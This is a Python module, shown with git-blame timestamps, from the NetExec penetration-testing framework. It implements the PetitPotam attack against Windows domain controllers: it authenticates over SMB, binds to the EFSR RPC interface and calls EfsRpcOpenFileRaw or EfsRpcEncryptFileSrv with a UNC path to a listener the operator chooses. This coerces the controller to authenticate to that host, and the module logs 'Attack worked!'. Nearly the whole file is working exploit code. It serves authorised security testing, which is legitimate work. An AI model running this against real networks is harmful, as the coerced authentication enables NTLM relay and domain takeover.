2022-07-18 23:59:14 +00:00
|
|
|
#!/usr/bin/env python3
|
|
|
|
# -*- coding: utf-8 -*-
|
2021-12-08 12:21:13 +00:00
|
|
|
# From https://github.com/topotam/PetitPotam
|
|
|
|
# All credit to @topotam
|
|
|
|
# Module by @mpgn_x64
|
|
|
|
|
2023-03-24 20:35:40 +00:00
|
|
|
import sys
|
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
from impacket import system_errors
|
|
|
|
from impacket.dcerpc.v5 import transport
|
|
|
|
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
|
2023-03-30 20:36:58 +00:00
|
|
|
from impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD, PCHAR, RPC_SID, LPWSTR
|
2023-05-02 15:17:59 +00:00
|
|
|
from impacket.dcerpc.v5.rpcrt import (
|
|
|
|
DCERPCException,
|
|
|
|
RPC_C_AUTHN_WINNT,
|
|
|
|
RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
|
|
|
|
RPC_C_AUTHN_GSS_NEGOTIATE,
|
|
|
|
)
|
2021-12-08 12:21:13 +00:00
|
|
|
from impacket.uuid import uuidtup_to_bin
|
|
|
|
|
2023-03-09 23:37:11 +00:00
|
|
|
|
2023-09-17 20:20:40 +00:00
|
|
|
class NXCModule:
|
2023-05-02 15:17:59 +00:00
|
|
|
name = "petitpotam"
|
2023-05-08 18:39:36 +00:00
|
|
|
description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam"
|
2023-05-02 15:17:59 +00:00
|
|
|
supported_protocols = ["smb"]
|
2021-12-08 12:21:13 +00:00
|
|
|
opsec_safe = True
|
2023-03-27 20:06:17 +00:00
|
|
|
multiple_hosts = True
|
2021-12-08 12:21:13 +00:00
|
|
|
|
|
|
|
def options(self, context, module_options):
|
2023-03-30 20:36:58 +00:00
|
|
|
"""
|
|
|
|
LISTENER IP of your listener
|
|
|
|
PIPE Default PIPE (default: lsarpc)
|
|
|
|
"""
|
2021-12-08 12:21:13 +00:00
|
|
|
self.listener = "127.0.0.1"
|
2023-05-02 15:17:59 +00:00
|
|
|
if "LISTENER" in module_options:
|
|
|
|
self.listener = module_options["LISTENER"]
|
2021-12-08 12:46:31 +00:00
|
|
|
self.pipe = "lsarpc"
|
2023-05-02 15:17:59 +00:00
|
|
|
if "PIPE" in module_options:
|
|
|
|
self.pipe = module_options["PIPE"]
|
2021-12-08 12:21:13 +00:00
|
|
|
|
|
|
|
def on_login(self, context, connection):
|
2023-03-24 20:35:40 +00:00
|
|
|
dce = coerce(
|
|
|
|
connection.username,
|
|
|
|
password=connection.password,
|
|
|
|
domain=connection.domain,
|
|
|
|
lmhash=connection.lmhash,
|
|
|
|
nthash=connection.nthash,
|
2023-07-03 17:18:33 +00:00
|
|
|
aesKey=connection.aesKey,
|
2023-05-08 18:39:36 +00:00
|
|
|
target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain,
|
2023-03-24 20:35:40 +00:00
|
|
|
pipe=self.pipe,
|
|
|
|
do_kerberos=connection.kerberos,
|
|
|
|
dc_host=connection.kdcHost,
|
2023-03-30 20:36:58 +00:00
|
|
|
target_ip=connection.host,
|
2023-05-02 15:17:59 +00:00
|
|
|
context=context,
|
2023-03-24 20:35:40 +00:00
|
|
|
)
|
2023-03-30 20:36:58 +00:00
|
|
|
if efs_rpc_open_file_raw(dce, self.listener, context):
|
2021-12-08 12:21:13 +00:00
|
|
|
context.log.highlight("VULNERABLE")
|
2021-12-18 20:28:34 +00:00
|
|
|
context.log.highlight("Next step: https://github.com/topotam/PetitPotam")
|
2023-03-09 23:37:11 +00:00
|
|
|
try:
|
2023-03-12 02:25:23 +00:00
|
|
|
host = context.db.get_hosts(connection.host)[0]
|
2023-05-02 15:17:59 +00:00
|
|
|
context.db.add_host(
|
|
|
|
host.ip,
|
|
|
|
host.hostname,
|
|
|
|
host.domain,
|
|
|
|
host.os,
|
|
|
|
host.smbv1,
|
|
|
|
host.signing,
|
|
|
|
petitpotam=True,
|
|
|
|
)
|
2023-09-20 15:59:16 +00:00
|
|
|
except Exception:
|
|
|
|
context.log.debug("Error updating petitpotam status in database")
|
2021-12-08 12:21:13 +00:00
|
|
|
|
|
|
|
|
|
|
|
class DCERPCSessionError(DCERPCException):
|
|
|
|
def __init__(self, error_string=None, error_code=None, packet=None):
|
|
|
|
DCERPCException.__init__(self, error_string, error_code, packet)
|
|
|
|
|
2023-05-02 15:17:59 +00:00
|
|
|
def __str__(self):
|
2021-12-08 12:21:13 +00:00
|
|
|
key = self.error_code
|
|
|
|
if key in system_errors.ERROR_MESSAGES:
|
|
|
|
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
|
|
|
|
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
|
2023-05-02 15:17:59 +00:00
|
|
|
return "EFSR SessionError: code: 0x%x - %s - %s" % (
|
|
|
|
self.error_code,
|
|
|
|
error_msg_short,
|
|
|
|
error_msg_verbose,
|
|
|
|
)
|
2021-12-08 12:21:13 +00:00
|
|
|
else:
|
2023-09-24 04:06:51 +00:00
|
|
|
return f"EFSR SessionError: unknown error code: 0x{self.error_code:x}"
|
2021-12-08 12:21:13 +00:00
|
|
|
|
|
|
|
|
|
|
|
################################################################################
|
|
|
|
# STRUCTURES
|
|
|
|
################################################################################
|
|
|
|
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
|
|
|
|
align = 1
|
2023-05-02 15:17:59 +00:00
|
|
|
structure = (("Data", "20s"),)
|
2023-03-09 23:37:11 +00:00
|
|
|
|
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
class EFS_EXIM_PIPE(NDRSTRUCT):
|
|
|
|
align = 1
|
2023-05-02 15:17:59 +00:00
|
|
|
structure = (("Data", ":"),)
|
2023-03-09 23:37:11 +00:00
|
|
|
|
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
class EFS_HASH_BLOB(NDRSTRUCT):
|
|
|
|
structure = (
|
2023-05-02 15:17:59 +00:00
|
|
|
("Data", DWORD),
|
|
|
|
("cbData", PCHAR),
|
2021-12-08 12:21:13 +00:00
|
|
|
)
|
2023-03-09 23:37:11 +00:00
|
|
|
|
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
class EFS_RPC_BLOB(NDRSTRUCT):
|
|
|
|
structure = (
|
2023-05-02 15:17:59 +00:00
|
|
|
("Data", DWORD),
|
|
|
|
("cbData", PCHAR),
|
2021-12-08 12:21:13 +00:00
|
|
|
)
|
2023-03-09 23:37:11 +00:00
|
|
|
|
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
|
|
|
|
structure = (
|
2023-05-02 15:17:59 +00:00
|
|
|
("Type", DWORD),
|
|
|
|
("Data", DWORD),
|
|
|
|
("cbData", PCHAR),
|
2023-03-09 23:37:11 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
|
|
|
|
structure = (
|
2023-05-02 15:17:59 +00:00
|
|
|
("Lenght", DWORD),
|
|
|
|
("SID", RPC_SID),
|
|
|
|
("Hash", EFS_HASH_BLOB),
|
|
|
|
("Display", LPWSTR),
|
2023-03-09 23:37:11 +00:00
|
|
|
)
|
|
|
|
|
2023-03-24 20:35:40 +00:00
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
|
|
|
|
structure = (
|
2023-05-02 15:17:59 +00:00
|
|
|
("Lenght", DWORD),
|
|
|
|
("SID", RPC_SID),
|
|
|
|
("Hash", EFS_CERTIFICATE_BLOB),
|
2023-03-09 23:37:11 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
|
|
|
|
align = 1
|
|
|
|
structure = (
|
2023-05-02 15:17:59 +00:00
|
|
|
("Cert", DWORD),
|
|
|
|
("Users", ENCRYPTION_CERTIFICATE_HASH),
|
2021-12-08 12:21:13 +00:00
|
|
|
)
|
2023-03-09 23:37:11 +00:00
|
|
|
|
|
|
|
|
|
|
|
class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
|
2021-12-08 12:21:13 +00:00
|
|
|
structure = (
|
2023-05-02 15:17:59 +00:00
|
|
|
("Type", DWORD),
|
|
|
|
("HASH", ENCRYPTION_CERTIFICATE_HASH_LIST),
|
|
|
|
("Certif", ENCRYPTION_CERTIFICATE),
|
|
|
|
("Blob", EFS_RPC_BLOB),
|
2023-03-09 23:37:11 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
|
|
|
|
align = 1
|
2023-05-02 15:17:59 +00:00
|
|
|
structure = (("Data", ":"),)
|
2021-12-08 12:21:13 +00:00
|
|
|
|
2023-03-09 23:37:11 +00:00
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
################################################################################
|
|
|
|
# RPC CALLS
|
|
|
|
################################################################################
|
|
|
|
class EfsRpcOpenFileRaw(NDRCALL):
|
|
|
|
opnum = 0
|
|
|
|
structure = (
|
2023-05-02 15:17:59 +00:00
|
|
|
("fileName", WSTR),
|
|
|
|
("Flag", ULONG),
|
2021-12-08 12:21:13 +00:00
|
|
|
)
|
2023-03-09 23:37:11 +00:00
|
|
|
|
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
class EfsRpcOpenFileRawResponse(NDRCALL):
|
|
|
|
structure = (
|
2023-05-02 15:17:59 +00:00
|
|
|
("hContext", EXIMPORT_CONTEXT_HANDLE),
|
|
|
|
("ErrorCode", ULONG),
|
2021-12-08 12:21:13 +00:00
|
|
|
)
|
2022-03-04 17:24:10 +00:00
|
|
|
|
2023-03-09 23:37:11 +00:00
|
|
|
|
2021-12-08 12:21:13 +00:00
|
|
|
class EfsRpcEncryptFileSrv(NDRCALL):
|
|
|
|
opnum = 4
|
2023-05-02 15:17:59 +00:00
|
|
|
structure = (("FileName", WSTR),)
|
2022-03-04 17:24:10 +00:00
|
|
|
|
2023-03-09 23:37:11 +00:00
|
|
|
|
2022-03-04 17:24:10 +00:00
|
|
|
class EfsRpcEncryptFileSrvResponse(NDRCALL):
|
2023-05-02 15:17:59 +00:00
|
|
|
structure = (("ErrorCode", ULONG),)
|
|
|
|
|
|
|
|
|
|
|
|
def coerce(
|
|
|
|
username,
|
|
|
|
password,
|
|
|
|
domain,
|
|
|
|
lmhash,
|
|
|
|
nthash,
|
2023-07-03 17:18:33 +00:00
|
|
|
aesKey,
|
2023-05-02 15:17:59 +00:00
|
|
|
target,
|
|
|
|
pipe,
|
|
|
|
do_kerberos,
|
|
|
|
dc_host,
|
|
|
|
target_ip=None,
|
|
|
|
context=None,
|
|
|
|
):
|
2023-03-24 20:35:40 +00:00
|
|
|
binding_params = {
|
2023-05-02 15:17:59 +00:00
|
|
|
"lsarpc": {
|
|
|
|
"stringBinding": r"ncacn_np:%s[\PIPE\lsarpc]" % target,
|
|
|
|
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
|
2023-03-24 20:35:40 +00:00
|
|
|
},
|
2023-05-02 15:17:59 +00:00
|
|
|
"efsr": {
|
|
|
|
"stringBinding": r"ncacn_np:%s[\PIPE\efsrpc]" % target,
|
|
|
|
"MSRPC_UUID_EFSR": ("df1941c5-fe89-4e79-bf10-463657acf44d", "1.0"),
|
2023-03-24 20:35:40 +00:00
|
|
|
},
|
2023-05-02 15:17:59 +00:00
|
|
|
"samr": {
|
|
|
|
"stringBinding": r"ncacn_np:%s[\PIPE\samr]" % target,
|
|
|
|
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
|
2023-03-24 20:35:40 +00:00
|
|
|
},
|
2023-05-02 15:17:59 +00:00
|
|
|
"lsass": {
|
|
|
|
"stringBinding": r"ncacn_np:%s[\PIPE\lsass]" % target,
|
|
|
|
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
|
2023-03-24 20:35:40 +00:00
|
|
|
},
|
2023-05-02 15:17:59 +00:00
|
|
|
"netlogon": {
|
|
|
|
"stringBinding": r"ncacn_np:%s[\PIPE\netlogon]" % target,
|
|
|
|
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
|
2023-03-24 20:35:40 +00:00
|
|
|
},
|
|
|
|
}
|
2023-05-08 18:39:36 +00:00
|
|
|
rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe]["stringBinding"])
|
2023-05-02 15:17:59 +00:00
|
|
|
if hasattr(rpc_transport, "set_credentials"):
|
|
|
|
rpc_transport.set_credentials(
|
|
|
|
username=username,
|
|
|
|
password=password,
|
|
|
|
domain=domain,
|
|
|
|
lmhash=lmhash,
|
|
|
|
nthash=nthash,
|
2023-07-03 17:18:33 +00:00
|
|
|
aesKey=aesKey,
|
2023-05-02 15:17:59 +00:00
|
|
|
)
|
2023-03-24 20:35:40 +00:00
|
|
|
|
|
|
|
if target_ip:
|
|
|
|
rpc_transport.setRemoteHost(target_ip)
|
|
|
|
|
|
|
|
dce = rpc_transport.get_dce_rpc()
|
|
|
|
dce.set_auth_type(RPC_C_AUTHN_WINNT)
|
|
|
|
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
|
|
|
|
|
|
|
if do_kerberos:
|
|
|
|
rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)
|
|
|
|
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
|
|
|
|
2023-09-24 04:06:51 +00:00
|
|
|
context.log.info(f"[-] Connecting to {binding_params[pipe]['stringBinding']}")
|
2023-03-24 20:35:40 +00:00
|
|
|
try:
|
|
|
|
dce.connect()
|
|
|
|
except Exception as e:
|
2023-09-24 04:06:51 +00:00
|
|
|
context.log.debug(f"Something went wrong, check error status => {str(e)}")
|
2023-03-24 20:35:40 +00:00
|
|
|
sys.exit()
|
2023-03-30 20:36:58 +00:00
|
|
|
context.log.info("[+] Connected!")
|
2023-09-24 04:06:51 +00:00
|
|
|
context.log.info(f"[+] Binding to {binding_params[pipe]['MSRPC_UUID_EFSR'][0]}")
|
2023-03-24 20:35:40 +00:00
|
|
|
try:
|
2023-05-02 15:17:59 +00:00
|
|
|
dce.bind(uuidtup_to_bin(binding_params[pipe]["MSRPC_UUID_EFSR"]))
|
2023-03-24 20:35:40 +00:00
|
|
|
except Exception as e:
|
2023-09-24 04:06:51 +00:00
|
|
|
context.log.debug(f"Something went wrong, check error status => {str(e)}")
|
2023-03-24 20:35:40 +00:00
|
|
|
sys.exit()
|
2023-03-30 20:36:58 +00:00
|
|
|
context.log.info("[+] Successfully bound!")
|
2023-03-24 20:35:40 +00:00
|
|
|
return dce
|
|
|
|
|
|
|
|
|
2023-03-30 20:36:58 +00:00
|
|
|
def efs_rpc_open_file_raw(dce, listener, context=None):
|
2023-03-24 20:35:40 +00:00
|
|
|
try:
|
|
|
|
request = EfsRpcOpenFileRaw()
|
2023-09-24 04:06:51 +00:00
|
|
|
request["fileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
|
2023-05-02 15:17:59 +00:00
|
|
|
request["Flag"] = 0
|
2023-09-20 15:59:16 +00:00
|
|
|
dce.request(request)
|
2023-03-24 20:35:40 +00:00
|
|
|
|
|
|
|
except Exception as e:
|
2023-05-02 15:17:59 +00:00
|
|
|
if str(e).find("ERROR_BAD_NETPATH") >= 0:
|
|
|
|
context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!")
|
|
|
|
context.log.info("[+] Attack worked!")
|
2023-03-24 20:35:40 +00:00
|
|
|
return True
|
2023-05-02 15:17:59 +00:00
|
|
|
if str(e).find("rpc_s_access_denied") >= 0:
|
2023-05-08 18:39:36 +00:00
|
|
|
context.log.info("[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!")
|
2023-05-02 15:17:59 +00:00
|
|
|
context.log.info("[+] OK! Using unpatched function!")
|
2023-03-30 20:36:58 +00:00
|
|
|
context.log.info("[-] Sending EfsRpcEncryptFileSrv!")
|
2023-03-24 20:35:40 +00:00
|
|
|
try:
|
|
|
|
request = EfsRpcEncryptFileSrv()
|
2023-09-24 04:06:51 +00:00
|
|
|
request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
|
2023-09-20 15:59:16 +00:00
|
|
|
dce.request(request)
|
2023-03-24 20:35:40 +00:00
|
|
|
except Exception as e:
|
2023-05-02 15:17:59 +00:00
|
|
|
if str(e).find("ERROR_BAD_NETPATH") >= 0:
|
|
|
|
context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!")
|
|
|
|
context.log.info("[+] Attack worked!")
|
2023-03-24 20:35:40 +00:00
|
|
|
return True
|
|
|
|
else:
|
2023-09-24 04:06:51 +00:00
|
|
|
context.log.debug(f"Something went wrong, check error status => {str(e)}")
|
2023-03-24 20:35:40 +00:00
|
|
|
else:
|
2023-09-24 04:06:51 +00:00
|
|
|
context.log.debug(f"Something went wrong, check error status => {str(e)}")
|